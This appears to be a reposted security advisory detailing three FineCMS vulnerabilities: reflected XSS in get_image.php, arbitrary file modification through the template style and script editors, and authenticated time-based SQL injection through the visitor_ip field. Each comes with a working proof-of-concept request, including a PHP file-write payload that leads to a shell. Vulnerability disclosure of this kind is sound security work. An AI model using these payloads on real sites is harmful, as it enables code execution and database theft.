记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Some Vulnerability for FineCMS through 2017.7.11

2017-07-12 00:10

Some Vulnerability for FineCMS through 2017.7.11

Reflected XSS in get_image.php

Technical Description:

file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded.

Proof of Concept(PoC)

1
2
3
4
5
http://your_finecms/application/lib/ajax/get_image.php?folder=1
POST:
id=1"><script>alert(1)</script>&name=1

image.png-45.5kB

Arbitrary File Modify

Technical Description:

The base function for modify the template css and script can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell.

file /appalication/core/controller/style.php line50-line53
image.png-56.1kB

follow function save()
file /appalication/core/model/style.php line26-line48
image.png-118.8kB

if file exists, we can modify it whihout any limit.

insterestingly, there are two more Vulnerability for same function in different files.

file /appalication/core/model/script.php line26-line48
image.png-101.7kB

Proof of Concept(PoC)

1
2
3
4
5
6
http://your_finecms/index.php?route=template
http://your_finecms/index.php?route=style
http://your_finecms/index.php?route=script
POST:
contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz

image.png-71.9kB

Authenticated SQL injection

all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database.

Technical Description:

file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded.

image.png-114.8kB

file /stat/get_stat_data.php line30

image.png-149.7kB

the sql inject into sql_query and execute.

Proof of Concept(PoC)

1
2
3
4
http://127.0.0.1/finecms/index.php?route=excludes&action=add
POST:
visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz

and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep.

image.png-138.7kB


知识来源: lorexxar.cn/2017/07/11/Some Vulnerability for FineCMS through 2017.7.11/

阅读:232930 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“Some Vulnerability for FineCMS through 2017.7.11”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词